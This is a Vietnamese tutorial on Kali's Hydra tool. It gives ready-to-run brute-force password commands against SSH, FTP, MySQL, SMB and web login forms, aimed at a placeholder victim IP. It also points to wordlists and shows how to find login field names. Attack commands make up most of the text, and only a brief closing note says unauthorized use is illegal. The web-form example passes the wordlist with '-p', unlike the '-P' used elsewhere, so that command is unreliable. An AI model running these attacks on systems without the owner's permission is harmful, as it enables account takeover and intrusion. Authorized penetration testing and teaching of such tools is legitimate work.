Hydra là gì?
Hydra là một trong những công cụ thường được Hacker và các nhà nghiên cứu bảo mật sử dụng. Đây công cụ có sẵn trong Kali Linux các phiên bản và được dùng để thực hiện các cuộc tấn công Brute Force Password hay còn gọi là dò mật khẩu.
Trong bài viết này, mình sẽ chỉ cho bạn cách thực hiện một cuộc tấn công brute force với Hydra trên Máy chủ FTP, MYSQL, SMB, SMTP, SSH và Web Login Auth.
Mình có bài phân tích về Brute Force và cách ngăn chặn rất chi tiết, nếu bạn muốn tìm hiểu sâu về phương thức này thì nên đọc kỹ bài này.
Wordlist
Khi tấn công Brute Force, bạn cần có sẵn 1 danh sách các ký tự dùng để dò đoán username và password. Bạn nên sử dụng WordList bộ Kaonashi hoặc bộ Worldlist do AnonyViet chia sẻ.
Username WordList:
Hydra cho phép bạn Brute Force cả username, nếu bạn không biết tên đăng nhập, bạn cũng có thể thử WorldList, để sử dụng Hydra tìm Username, bạn phải sửa đổi tham số -l user thành -L user.txt (user.txt là file chứa danh sách tên username dùng để dò mật khẩu).
Password WordList
Là danh sách các Password bạn sẽ dùng để đăng nhập thử vào trang Web hay SSH, FTP…., như đã nói ở trên mình thường dùng bộ Password WordList của AnonyViet sưu tầm.
Cách dùng Hydra để dò mật khẩu các dịch vụ mạng
Brute Force SSH bằng Hydra
Lệnh tấn công:
hydra -l user -P passwords.txt IP_VICTIM ssh
hoặc
hydra -L user.txt -P passwords.txt IP_VICTIM ssh
Brute Force trang Login Website bằng Hydra
Lệnh tấn công:
hydra -l user -p passwords.txt IP_VICTIM http-post-form '/path/login:username_field&password_field=^PASS^:wrong'
Thay thế /path/login:username_field&password_field= bằng đường dẫn và file đăng nhập trong link HTML
wrong: nếu từ này xuất hiện trên trang, thì mật khẩu chưa chính xác
Cách lấy Username Field và Password Field:
- Username Field: mở Firefox nhấn F12 -> Network -> Send Login.
- Password Field: mở Firefox nhấn Firefox F12 -> Network -> Send Login.
Hoặc bạn có thể dùng Burp Suite để bắt Request.
Brute Force FTP
Lệnh tấn công:
hydra -l user -P passwords.txt IP_VICTIM ftp
Brute Force MYSQL
hydra -l user -P passwords.txt IP_VICTIM mysql
Brute Force SMB
hydra -l user -P passwords.txt IP_VICTIM smb
Trên Kali Linux cũng có Hydra phiên bản có giao diện, có thể sẽ dễ sử dụng hơn so với Hydra dòng lệnh để Brute Force, nhưng theo mình bạn nên tập thói quen dùng dòng lệnh để tập làm quen trên Linux và khi cài Hydra lên các hệ điều hành khác bạn có thể dễ dàng sử dụng. Hiện nay cũng có Hydra phiên bản Windows, nhưng mình chưa sử dụng, bạn nào dùng rồi thì comment bên dưới nha.
Câu hỏi thường gặp
Hydra là gì và nó hoạt động như thế nào?
Hydra là một công cụ mạnh mẽ dùng để thực hiện tấn công brute-force vào các dịch vụ mạng khác nhau như SSH, FTP, MySQL, v.v. Nó hoạt động bằng cách thử nhiều tổ hợp tên người dùng và mật khẩu cho đến khi tìm thấy sự kết hợp chính xác.
Tôi cần những gì để sử dụng Hydra?
Bạn cần một danh sách mật khẩu (wordlist) và địa chỉ IP (hoặc tên miền) của mục tiêu. Hydra cũng cần được cài đặt trên hệ thống của bạn (có sẵn trong Kali Linux).
Có an toàn khi sử dụng Hydra không?
Việc sử dụng Hydra để tấn công vào hệ thống mà bạn không được phép truy cập là bất hợp pháp. Chỉ sử dụng Hydra cho mục đích nghiên cứu bảo mật trên các hệ thống mà bạn có quyền truy cập hợp pháp và đã được sự cho phép của chủ sở hữu.
